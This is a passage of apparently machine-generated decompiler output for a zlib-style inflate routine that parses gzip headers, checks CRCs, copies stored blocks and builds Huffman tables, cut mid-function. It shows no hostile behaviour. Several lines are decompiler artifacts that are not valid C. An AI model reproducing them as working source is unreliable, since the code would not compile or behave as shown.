                                                                                                          									__eflags = __ecx;
                                                                                                          									if(__ecx == 0) {
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__esi = _v8;
                                                                                                          									__eax = __edx;
                                                                                                          									_t196 =  &_v12; // 0x38
                                                                                                          									__edx =  *_t196;
                                                                                                          									while(1) {
                                                                                                          										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                          										__eax = __eax + 1;
                                                                                                          										_v48 = __ecx;
                                                                                                          										__ecx =  *(__ebx + 0x20);
                                                                                                          										_v56 = __eax;
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											__edx =  *(__ecx + 0x1c);
                                                                                                          											__eflags =  *(__ecx + 0x1c);
                                                                                                          											if( *(__ecx + 0x1c) != 0) {
                                                                                                          												__edx =  *(__ebx + 0x40);
                                                                                                          												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                          												if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                          													__ecx =  *(__ecx + 0x1c);
                                                                                                          													__eax = _v48;
                                                                                                          													 *(__ecx + __edx) = __al;
                                                                                                          													_t207 = __ebx + 0x40;
                                                                                                          													 *_t207 =  *(__ebx + 0x40) + 1;
                                                                                                          													__eflags =  *_t207;
                                                                                                          													__eax = _v56;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											_t210 =  &_v12; // 0x38
                                                                                                          											__edx =  *_t210;
                                                                                                          										}
                                                                                                          										__eflags = _v48;
                                                                                                          										if(_v48 == 0) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										__eflags = __eax - __esi;
                                                                                                          										if(__eax < __esi) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										break;
                                                                                                          									}
                                                                                                          									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          									_t215 =  &_a4; // 0x38
                                                                                                          									__esi =  *_t215;
                                                                                                          									if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          										 *(__ebx + 0x18) = __eax;
                                                                                                          										__eax = _v56;
                                                                                                          									}
                                                                                                          									__ecx = _v8;
                                                                                                          									_v12 = _v12 + __eax;
                                                                                                          									__ecx = _v8 - __eax;
                                                                                                          									__eflags = _v48;
                                                                                                          									_v8 = __ecx;
                                                                                                          									if(_v48 != 0) {
                                                                                                          										goto L331;
                                                                                                          									} else {
                                                                                                          										goto L110;
                                                                                                          									}
                                                                                                          								case 7:
                                                                                                          									__edx = 0;
                                                                                                          									__eflags = 0;
                                                                                                          									L112:
                                                                                                          									__eflags =  *(__ebx + 0x10) & 0x00001000;
                                                                                                          									if(( *(__ebx + 0x10) & 0x00001000) == 0) {
                                                                                                          										__eax =  *(__ebx + 0x20);
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											 *(__eax + 0x24) = __edx;
                                                                                                          										}
                                                                                                          										L128:
                                                                                                          										__edx = _v16;
                                                                                                          										 *__ebx = 8;
                                                                                                          										goto L129;
                                                                                                          									}
                                                                                                          									__eflags = __ecx;
                                                                                                          									if(__ecx == 0) {
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__esi = _v8;
                                                                                                          									__eax = __edx;
                                                                                                          									_t231 =  &_v12; // 0x38
                                                                                                          									__edx =  *_t231;
                                                                                                          									while(1) {
                                                                                                          										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                          										__eax = __eax + 1;
                                                                                                          										_v48 = __ecx;
                                                                                                          										__ecx =  *(__ebx + 0x20);
                                                                                                          										_v56 = __eax;
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											__edx =  *(__ecx + 0x24);
                                                                                                          											__eflags =  *(__ecx + 0x24);
                                                                                                          											if( *(__ecx + 0x24) != 0) {
                                                                                                          												__edx =  *(__ebx + 0x40);
                                                                                                          												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                          												if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                          													__ecx =  *(__ecx + 0x24);
                                                                                                          													__eax = _v48;
                                                                                                          													 *(__ecx + __edx) = __al;
                                                                                                          													_t242 = __ebx + 0x40;
                                                                                                          													 *_t242 =  *(__ebx + 0x40) + 1;
                                                                                                          													__eflags =  *_t242;
                                                                                                          													__eax = _v56;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											_t245 =  &_v12; // 0x38
                                                                                                          											__edx =  *_t245;
                                                                                                          										}
                                                                                                          										__eflags = _v48;
                                                                                                          										if(_v48 == 0) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										__eflags = __eax - __esi;
                                                                                                          										if(__eax < __esi) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										break;
                                                                                                          									}
                                                                                                          									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          									_t250 =  &_a4; // 0x38
                                                                                                          									__esi =  *_t250;
                                                                                                          									if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          										 *(__ebx + 0x18) = __eax;
                                                                                                          										__eax = _v56;
                                                                                                          									}
                                                                                                          									__ecx = _v8;
                                                                                                          									_v12 = _v12 + __eax;
                                                                                                          									__ecx = _v8 - __eax;
                                                                                                          									__eflags = _v48;
                                                                                                          									_v8 = __ecx;
                                                                                                          									if(_v48 != 0) {
                                                                                                          										goto L331;
                                                                                                          									} else {
                                                                                                          										goto L128;
                                                                                                          									}
                                                                                                          								case 8:
                                                                                                          									L129:
                                                                                                          									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          									if(( *(__ebx + 0x10) & 0x00000200) == 0) {
                                                                                                          										__edx = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										L138:
                                                                                                          										__ecx =  *(__ebx + 0x20);
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											 *(__ebx + 0x10) =  *(__ebx + 0x10) >> 9;
                                                                                                          											__eax =  *(__ebx + 0x10) >> 0x00000009 & 0x00000001;
                                                                                                          											__eflags = __eax;
                                                                                                          											 *(__ecx + 0x2c) = __eax;
                                                                                                          											__eax =  *(__ebx + 0x20);
                                                                                                          											 *( *(__ebx + 0x20) + 0x30) = 1;
                                                                                                          										}
                                                                                                          										__eax = E008830C1(__edx, __edx, __edx);
                                                                                                          										 *(__ebx + 0x18) = __eax;
                                                                                                          										 *(__esi + 0x30) = __eax;
                                                                                                          										 *__ebx = 0xb;
                                                                                                          										goto L141;
                                                                                                          									}
                                                                                                          									_push(0x10);
                                                                                                          									_pop(__eax);
                                                                                                          									__eflags = __edi - __eax;
                                                                                                          									if(__edi >= __eax) {
                                                                                                          										L134:
                                                                                                          										__eax =  *(__ebx + 0x18) & 0x0000ffff;
                                                                                                          										__eflags = __edx - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                                                          										if(__edx == ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                                                          											__edx = 0;
                                                                                                          											__edi = 0;
                                                                                                          											_v16 = 0;
                                                                                                          											_v20 = 0;
                                                                                                          											goto L138;
                                                                                                          										}
                                                                                                          										 *(__esi + 0x18) = "header crc mismatch";
                                                                                                          										goto L25;
                                                                                                          									}
                                                                                                          									_t265 =  &_v12; // 0x38
                                                                                                          									__eax =  *_t265;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx = _v8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t268 =  &_v12; // 0x38
                                                                                                          										__eax =  *_t268;
                                                                                                          										__eax =  *_t268 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										_v20 = __edi;
                                                                                                          										__eflags = __edi - 0x10;
                                                                                                          										if(__edi < 0x10) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L134;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 9:
                                                                                                          									__eflags = __edi - 0x20;
                                                                                                          									if(__edi >= 0x20) {
                                                                                                          										L151:
                                                                                                          										__ecx = __edx;
                                                                                                          										__edi = 0xff00;
                                                                                                          										__ecx = __edx & 0x0000ff00;
                                                                                                          										__edx = __edx << 0x10;
                                                                                                          										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                          										__edx = __edx >> 8;
                                                                                                          										__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                          										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                          										__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                          										__edx = __edx >> 0x18;
                                                                                                          										__ecx = _v8;
                                                                                                          										__eax = __eax + __edx;
                                                                                                          										 *(__ebx + 0x18) = __eax;
                                                                                                          										 *(__esi + 0x30) = __eax;
                                                                                                          										__eax = 0;
                                                                                                          										__edx = 0;
                                                                                                          										 *__ebx = 0xa;
                                                                                                          										_v16 = 0;
                                                                                                          										__edi = 0;
                                                                                                          										goto L153;
                                                                                                          									}
                                                                                                          									__eax = _v12;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx = _v8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										__eax = _v12;
                                                                                                          										__eax = _v12 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi < 0x20) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L151;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 0xa:
                                                                                                          									__eax = 0;
                                                                                                          									__eflags = 0;
                                                                                                          									L153:
                                                                                                          									__eflags =  *((intOrPtr*)(__ebx + 0xc)) - __eax;
                                                                                                          									if( *((intOrPtr*)(__ebx + 0xc)) == __eax) {
                                                                                                          										__eax = _v32;
                                                                                                          										 *(__esi + 0xc) = _v32;
                                                                                                          										__eax = _v28;
                                                                                                          										 *(__esi + 0x10) = _v28;
                                                                                                          										__eax = _v12;
                                                                                                          										 *__esi = _v12;
                                                                                                          										 *(__esi + 4) = __ecx;
                                                                                                          										 *(__ebx + 0x38) = __edx;
                                                                                                          										 *(__ebx + 0x3c) = __edi;
                                                                                                          										_push(2);
                                                                                                          										goto L145;
                                                                                                          									}
                                                                                                          									__eax = E00882E91(__eax, __eax, __eax);
                                                                                                          									__edx = _v16;
                                                                                                          									__ecx = _v8;
                                                                                                          									 *(__ebx + 0x18) = __eax;
                                                                                                          									 *(__esi + 0x30) = __eax;
                                                                                                          									 *__ebx = 0xb;
                                                                                                          									goto L155;
                                                                                                          								case 0xb:
                                                                                                          									L155:
                                                                                                          									__eflags = _a8 - 5;
                                                                                                          									if(_a8 == 5) {
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__eflags = _a8 - 6;
                                                                                                          									if(_a8 == 6) {
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									goto L157;
                                                                                                          								case 0xc:
                                                                                                          									L157:
                                                                                                          									__eflags =  *(__ebx + 4);
                                                                                                          									if( *(__ebx + 4) == 0) {
                                                                                                          										__eflags = __edi - 3;
                                                                                                          										if(__edi >= 3) {
                                                                                                          											L163:
                                                                                                          											__eax = __edx;
                                                                                                          											__edx = __edx >> 1;
                                                                                                          											 *(__ebx + 4) = __eax;
                                                                                                          											__edx = __edx & 0x00000003;
                                                                                                          											__eax = __edx & 0x00000003;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax == 0) {
                                                                                                          												 *__ebx = 0xd;
                                                                                                          												L172:
                                                                                                          												__edx = __edx >> 2;
                                                                                                          												__edi = __edi - 3;
                                                                                                          												L29:
                                                                                                          												_v16 = _t834;
                                                                                                          												_v20 = _t844;
                                                                                                          												goto L142;
                                                                                                          											}
                                                                                                          											__eax = __eax - 1;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax == 0) {
                                                                                                          												__eax = E00881718(__ebx);
                                                                                                          												 *__ebx = 0x13;
                                                                                                          												__eflags = _a8 - 6;
                                                                                                          												if(_a8 != 6) {
                                                                                                          													goto L172;
                                                                                                          												}
                                                                                                          												__edx = __edx >> 2;
                                                                                                          												__edi = __edi - 3;
                                                                                                          												_v16 = __edx;
                                                                                                          												goto L331;
                                                                                                          											}
                                                                                                          											__eax = __eax - 1;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax == 0) {
                                                                                                          												_push(0x10);
                                                                                                          												_pop(__eax);
                                                                                                          												 *__ebx = __eax;
                                                                                                          											} else {
                                                                                                          												__eax = __eax - 1;
                                                                                                          												__eflags = __eax;
                                                                                                          												if(__eax == 0) {
                                                                                                          													 *(__esi + 0x18) = "invalid block type";
                                                                                                          													 *__ebx = 0x1d;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											goto L172;
                                                                                                          										}
                                                                                                          										__eax = _v12;
                                                                                                          										while(1) {
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L331;
                                                                                                          											}
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											_v8 = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx = _v8;
                                                                                                          											__edx = __edx + __eax;
                                                                                                          											__eax = _v12;
                                                                                                          											__eax = _v12 + 1;
                                                                                                          											_v16 = __edx;
                                                                                                          											_v12 = __eax;
                                                                                                          											__eflags = __edi - 3;
                                                                                                          											if(__edi < 3) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L163;
                                                                                                          										}
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__ecx = __edi;
                                                                                                          									 *__ebx = 0x1a;
                                                                                                          									__ecx = __edi & 0x00000007;
                                                                                                          									__edx = __edx >> __cl;
                                                                                                          									__edi = __edi - __ecx;
                                                                                                          									_v16 = __edx;
                                                                                                          									_v20 = __edi;
                                                                                                          									goto L142;
                                                                                                          								case 0xd:
                                                                                                          									__edi = __edi & 0x00000007;
                                                                                                          									__edi = __edi - (__edi & 0x00000007);
                                                                                                          									__edx = __edx >> __cl;
                                                                                                          									_v16 = __edx;
                                                                                                          									_v20 = __edi;
                                                                                                          									__eflags = __edi - 0x20;
                                                                                                          									if(__edi >= 0x20) {
                                                                                                          										L177:
                                                                                                          										__eax = __edx;
                                                                                                          										__ecx = __edx;
                                                                                                          										__eax =  !__edx;
                                                                                                          										__ecx = __edx & 0x0000ffff;
                                                                                                          										__eax =  !__edx >> 0x10;
                                                                                                          										__eflags = __ecx -  !__edx >> 0x10;
                                                                                                          										if(__ecx ==  !__edx >> 0x10) {
                                                                                                          											__eax = 0;
                                                                                                          											 *(__ebx + 0x40) = __ecx;
                                                                                                          											__eflags = _a8 - 6;
                                                                                                          											__edx = 0;
                                                                                                          											__ecx = _v8;
                                                                                                          											__edi = 0;
                                                                                                          											_v16 = 0;
                                                                                                          											_v20 = 0;
                                                                                                          											 *__ebx = 0xe;
                                                                                                          											if(_a8 == 6) {
                                                                                                          												goto L332;
                                                                                                          											}
                                                                                                          											goto L180;
                                                                                                          										}
                                                                                                          										 *(__esi + 0x18) = "invalid stored block lengths";
                                                                                                          										goto L25;
                                                                                                          									}
                                                                                                          									__eax = _v12;
                                                                                                          									while(1) {
                                                                                                          										__ecx = _v8;
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L332;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_v20 = __edi;
                                                                                                          										__eax = _v12;
                                                                                                          										__eax = _v12 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi < 0x20) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L177;
                                                                                                          									}
                                                                                                          									goto L332;
                                                                                                          								case 0xe:
                                                                                                          									L180:
                                                                                                          									 *__ebx = 0xf;
                                                                                                          									goto L181;
                                                                                                          								case 0xf:
                                                                                                          									L181:
                                                                                                          									__eax =  *(__ebx + 0x40);
                                                                                                          									__eflags = __eax;
                                                                                                          									if(__eax == 0) {
                                                                                                          										 *__ebx = 0xb;
                                                                                                          										goto L143;
                                                                                                          									}
                                                                                                          									__eflags = __eax - __ecx;
                                                                                                          									__eax =  >  ? __ecx : __eax;
                                                                                                          									__eflags = __eax - _v28;
                                                                                                          									__eax =  >  ? _v28 : __eax;
                                                                                                          									_v56 = __eax;
                                                                                                          									__eflags = __eax;
                                                                                                          									if(__eax == 0) {
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__eax = memcpy(_v32, _v12, __eax);
                                                                                                          									__eax = _v56;
                                                                                                          									__esp = __esp + 0xc;
                                                                                                          									__ecx = _v8;
                                                                                                          									_v12 = _v12 + __eax;
                                                                                                          									__ecx = _v8 - __eax;
                                                                                                          									_v28 = _v28 - __eax;
                                                                                                          									_v32 = _v32 + __eax;
                                                                                                          									 *(__ebx + 0x40) =  *(__ebx + 0x40) - __eax;
                                                                                                          									__edx = _v16;
                                                                                                          									_v8 = __ecx;
                                                                                                          									goto L143;
                                                                                                          								case 0x10:
                                                                                                          									__eflags = __edi - 0xe;
                                                                                                          									if(__edi >= 0xe) {
                                                                                                          										L189:
                                                                                                          										__eax = __edx;
                                                                                                          										__edi = __edi - 0xe;
                                                                                                          										__eax = __edx & 0x0000001f;
                                                                                                          										__edx = __edx >> 5;
                                                                                                          										__eax = __eax + 0x101;
                                                                                                          										_v20 = __edi;
                                                                                                          										 *(__ebx + 0x60) = __eax;
                                                                                                          										__eax = __edx;
                                                                                                          										__eax = __edx & 0x0000001f;
                                                                                                          										__edx = __edx >> 5;
                                                                                                          										 *(__ebx + 0x64) = __eax;
                                                                                                          										__eax = __edx;
                                                                                                          										__eax = __edx & 0x0000000f;
                                                                                                          										__edx = __edx >> 4;
                                                                                                          										__eax = __eax + 4;
                                                                                                          										_v16 = __edx;
                                                                                                          										__eflags =  *(__ebx + 0x60) - 0x11e;
                                                                                                          										 *(__ebx + 0x5c) = __eax;
                                                                                                          										if( *(__ebx + 0x60) > 0x11e) {
                                                                                                          											L192:
                                                                                                          											 *(__esi + 0x18) = "too many length or distance symbols";
                                                                                                          											goto L39;
                                                                                                          										}
                                                                                                          										__eflags =  *(__ebx + 0x64) - 0x1e;
                                                                                                          										if( *(__ebx + 0x64) > 0x1e) {
                                                                                                          											goto L192;
                                                                                                          										}
                                                                                                          										 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                          										_push(0x11);
                                                                                                          										_pop(__eax);
                                                                                                          										 *__ebx = __eax;
                                                                                                          										goto L198;
                                                                                                          									}
                                                                                                          									__eax = _v12;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx = _v8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										__eax = _v12;
                                                                                                          										__eax = _v12 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										__eflags = __edi - 0xe;
                                                                                                          										if(__edi < 0xe) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L189;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 0x11:
                                                                                                          									while(1) {
                                                                                                          										L198:
                                                                                                          										__eax =  *(__ebx + 0x68);
                                                                                                          										__eflags =  *(__ebx + 0x68) -  *(__ebx + 0x5c);
                                                                                                          										if( *(__ebx + 0x68) >=  *(__ebx + 0x5c)) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										__eflags = __edi - 3;
                                                                                                          										if(__edi >= 3) {
                                                                                                          											L197:
                                                                                                          											__eax =  *(__ebx + 0x68);
                                                                                                          											__edx = __edx & 0x00000007;
                                                                                                          											__edx = __edx >> 3;
                                                                                                          											_v16 = __edx;
                                                                                                          											__eax =  *(0x884908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                          											 *((short*)(__ebx + 0x70 + ( *(0x884908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                          											 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                          											__edi = __edi - 3;
                                                                                                          											__eflags = __edi;
                                                                                                          											__ecx = _v8;
                                                                                                          											_v20 = __edi;
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										__eax = _v12;
                                                                                                          										while(1) {
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L331;
                                                                                                          											}
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											_v8 = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx = _v8;
                                                                                                          											__edx = __edx + __eax;
                                                                                                          											__eax = _v12;
                                                                                                          											__eax = _v12 + 1;
                                                                                                          											_v16 = __edx;
                                                                                                          											_v12 = __eax;
                                                                                                          											__eflags = __edi - 3;
                                                                                                          											if(__edi < 3) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L197;
                                                                                                          										}
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									while(1) {
                                                                                                          										__eflags =  *(__ebx + 0x68) - 0x13;
                                                                                                          										if( *(__ebx + 0x68) >= 0x13) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										__eax =  *(__ebx + 0x68);
                                                                                                          										__ecx = 0;
                                                                                                          										__eax =  *(0x884908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                          										 *((short*)(__ebx + 0x70 + ( *(0x884908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                          										_t389 = __ebx + 0x68;
                                                                                                          										 *_t389 =  *(__ebx + 0x68) + 1;
                                                                                                          										__eflags =  *_t389;
                                                                                                          									}
                                                                                                          									__eax = __ebx + 0x530;
                                                                                                          									__ecx = __ebx + 0x6c;
                                                                                                          									 *(__ebx + 0x4c) = __eax;
                                                                                                          									 *(__ebx + 0x6c) = __eax;
                                                                                                          									__edx = __ebx + 0x54;
                                                                                                          									__eax = __ebx + 0x2f0;
                                                                                                          									 *(__ebx + 0x54) = 7;
                                                                                                          									__eax = __ebx + 0x70;
                                                                                                          									__eax = E008833B4(0, __ebx + 0x70, 0x13, __ecx, __edx, __ebx + 0x2f0);
                                                                                                          									_v36 = __eax;
                                                                                                          									__eflags = __eax;
                                                                                                          									if(__eax == 0) {
                                                                                                          										 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                          										 *__ebx = 0x12;
                                                                                                          										goto L233;
                                                                                                          									}
                                                                                                          									 *(__esi + 0x18) = "invalid code lengths set";
                                                                                                          									goto L204;
                                                                                                          								case 0x12:
                                                                                                          									while(1) {
                                                                                                          										L233:
                                                                                                          										 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                          										__ecx =  *(__ebx + 0x68);
                                                                                                          										_v48 = __ecx;
                                                                                                          										__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                          										if(__ecx <  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                          											goto L208;
                                                                                                          										} else {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										while(1) {
                                                                                                          											L208:
                                                                                                          											__ecx =  *(__ebx + 0x54);
                                                                                                          											__edx = 0;
                                                                                                          											__eax =  *(__ebx + 0x4c);
                                                                                                          											1 = 1 << __cl;
                                                                                                          											__edx = (1 << __cl) - 1;
                                                                                                          											__edx = (1 << __cl) - 0x00000001 & _v16;
                                                                                                          											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & _v16) * 4);
                                                                                                          											__eax = __eax >> 8;
                                                                                                          											__ecx = __cl & 0x000000ff;
                                                                                                          											_v56 = __eax;
                                                                                                          											__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                          											if((__cl & 0x000000ff) <= __edi) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											__ecx = _v8;
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L332;
                                                                                                          											}
                                                                                                          											__edx = _v12;
                                                                                                          											_v8 = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											 *__edx & 0x000000ff = ( *__edx & 0x000000ff) << __cl;
                                                                                                          											_v16 = _v16 + (( *__edx & 0x000000ff) << __cl);
                                                                                                          											_v12 = __edx;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__eflags = __edi;
                                                                                                          										}
                                                                                                          										__edx = __eax;
                                                                                                          										_push(0x10);
                                                                                                          										__edx = __eax >> 0x10;
                                                                                                          										_pop(__ecx);
                                                                                                          										__eflags = __dx - __cx;
                                                                                                          										if(__eflags >= 0) {
                                                                                                          											if(__eflags != 0) {
                                                                                                          												__edx = _v16;
                                                                                                          												_push(0x11);
                                                                                                          												_pop(__ecx);
                                                                                                          												__eflags = _v54 - __cx;
                                                                                                          												__ecx = __ah & 0x000000ff;
                                                                                                          												if(_v54 != __cx) {
                                                                                                          													_v20 = __ecx;
                                                                                                          													while(1) {
                                                                                                          														_t453 = __ecx + 7; // 0x18
                                                                                                          														__eax = _t453;
                                                                                                          														__eflags = __edi - _t453;
                                                                                                          														if(__edi >= _t453) {
                                                                                                          															break;
                                                                                                          														}
                                                                                                          														__ecx = _v8;
                                                                                                          														__eflags = __ecx;
                                                                                                          														if(__ecx == 0) {
                                                                                                          															goto L332;
                                                                                                          														}
                                                                                                          														__eax = _v12;
                                                                                                          														_v8 = __ecx;
                                                                                                          														__ecx = __edi;
                                                                                                          														 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                          														__ecx = _v20;
                                                                                                          														__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                          														_v12 = _v12 + 1;
                                                                                                          														__edi = __edi + 8;
                                                                                                          														_v16 = __edx;
                                                                                                          													}
                                                                                                          													__edx = __edx >> __cl;
                                                                                                          													__ecx = __edx;
                                                                                                          													__edx = __edx >> 7;
                                                                                                          													__ecx = __ecx & 0x0000007f;
                                                                                                          													_push(0xfffffff9);
                                                                                                          													_pop(__eax);
                                                                                                          													__ecx = __ecx + 0xb;
                                                                                                          													__eax = __eax - _v20;
                                                                                                          													__eflags = __eax;
                                                                                                          													L228:
                                                                                                          													_v56 = _v56 & 0x00000000;
                                                                                                          													__edi = __edi + __eax;
                                                                                                          													__eflags = __edi;
                                                                                                          													L229:
                                                                                                          													 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                          													_v52 = __ecx;
                                                                                                          													__ecx = __ecx + _v48;
                                                                                                          													_v16 = __edx;
                                                                                                          													_v20 = __edi;
                                                                                                          													__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                          													if(__ecx >  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                          														 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                          														 *__ebx = 0x1d;
                                                                                                          														L237:
                                                                                                          														__eflags =  *__ebx - 0x1d;
                                                                                                          														if( *__ebx == 0x1d) {
                                                                                                          															L141:
                                                                                                          															__edx = _v16;
                                                                                                          															goto L142;
                                                                                                          														}
                                                                                                          														__eax = 0;
                                                                                                          														__eflags =  *((intOrPtr*)(__ebx + 0x270)) - __ax;
                                                                                                          														if( *((intOrPtr*)(__ebx + 0x270)) != __ax) {
                                                                                                          															__eax = __ebx + 0x530;
                                                                                                          															__ecx = __ebx + 0x6c;
                                                                                                          															 *(__ebx + 0x4c) = __eax;
                                                                                                          															 *(__ebx + 0x6c) = __eax;
                                                                                                          															__edx = __ebx + 0x54;
                                                                                                          															__eax = __ebx + 0x2f0;
                                                                                                          															 *(__ebx + 0x54) = 9;
                                                                                                          															__eax = __ebx + 0x70;
                                                                                                          															__eax = E008833B4(1, __ebx + 0x70,  *(__ebx + 0x60), __ecx, __edx, __ebx + 0x2f0);
                                                                                                          															_v36 = __eax;
                                                                                                          															__eflags = __eax;
                                                                                                          															if(__eax == 0) {
                                                                                                          																__ecx = __ebx + 0x6c;
                                                                                                          																__eax =  *__ecx;
                                                                                                          																__edx = __ebx + 0x58;
                                                                                                          																 *(__ebx + 0x50) =  *__ecx;
                                                                                                          																__ebx + 0x2f0 =  *(__ebx + 0x60);
                                                                                                          																__eax =  *(__ebx + 0x60) + 0x38;
